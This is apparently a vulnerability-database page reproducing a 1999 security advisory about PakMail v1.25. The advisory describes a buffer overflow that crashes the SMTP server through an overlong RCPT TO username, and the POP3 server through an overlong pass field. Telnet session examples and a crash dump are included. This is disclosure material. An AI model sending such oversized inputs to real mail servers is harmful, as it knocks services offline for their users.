Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

pakmail.txt

🗓️ 06 Dec 1999 00:00:00Reported by slackeeType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 40 Views

Vulnerability in PakMail v1.25 allows DoS attacks via long usernames in SMTP and POP3 servers.

Code
`Vulnerable Program: PakMail v1.25 SMTP/POP3 Server  
Platform : Windows95, 98, NT  
Vendor : SilverSoft Corporation (www.pak.net)  
Impact : Remote/local users can DoS both STMP & POP3 servers  
Found by : slackee ( [email protected] )  
Date : 5th December '99  
  
  
PakMail SMTP/POP3 Server  
________________________  
  
Pakmail V1.25, a state of the art POP3 and SMTP server, brings mail services common on   
Unix hosts and the Internet to Windows based micro-computers. This server is suited to   
corporate bodies and ISP's dealing in mail management. PakMail provides the following   
features.   
  
.User friendly maintenance of accounts   
.High performance yet low CPU usage   
.Mail Forwarding   
.Mailing Lists   
.Realtime status information   
.Debug logging   
.Powerful SMTP and POP3 builtin clients   
.Transparent SMTP and POP3 mail gateway.   
.Powerful yet easy management of sub-domains   
  
  
Vulnerability  
_____________  
  
Rewted Network Security Labs found a local/remote DoS attack in PakMail SMTP and POP3  
servers, the buffer overflow is caused by a long username specifed for the `RCPT TO:`   
field, in the SMTP server.  
  
Example:   
  
telnet localhost 25  
220 jedi PakMail Mail Server ready at Sun, 05 Dec 99  
mail from: test@localhost  
250 test@localhost Sender Ok  
rcpt to: $buffer@localhost  
  
where buffer, is roughly 1390 characters. The server will shutdown with an illegal operation  
and can no longer be used, until restarted. The error is as follows:  
  
PAKMAIL caused an invalid page fault in  
module KERNEL32.DLL at 0137:bff9a5d0.  
Registers:  
EAX=c001743c CS=0137 EIP=bff9a5d0 EFLGS=00010212  
EBX=0159ffb8 SS=013f ESP=0149ff38 EBP=014a01d4  
ECX=00000000 DS=013f ESI=00000000 FS=4717  
EDX=bff7678c ES=013f EDI=bffb8e70 GS=0000  
Bytes at CS:EIP:  
53 8b 15 7c c2 fb bf 56 89 4d e4 57 89 4d dc 89   
Stack dump:  
  
Likewise, the POP3 server is also vulnerable to a similar attack, except the buffer overflow  
occurs when an extra long `pass` field is entered. The buffer for this is approx 1400 chars.  
PAKMAIL will crash with an almost identical error.  
  
Example:  
  
telnet localhost 110  
+OK PakMail on (jedi) at (Sun, 05 Dec 99)  
user test  
+OK  
pass $buffer  
  
The program will then terminate.  
  
  
Solution  
_____________  
  
Silversoft Corporation has been notified about this, so either wait for a patched release  
or switch smtp/pop3 servers.  
  
________________________________________________________  
r e w t e d n e t w o r k s e c u r i t y l a b s  
http://www.rewted.org  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Dec 1999 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerable programpakmailsmtp serverpop3 serverbuffer overflowdenial of service.
40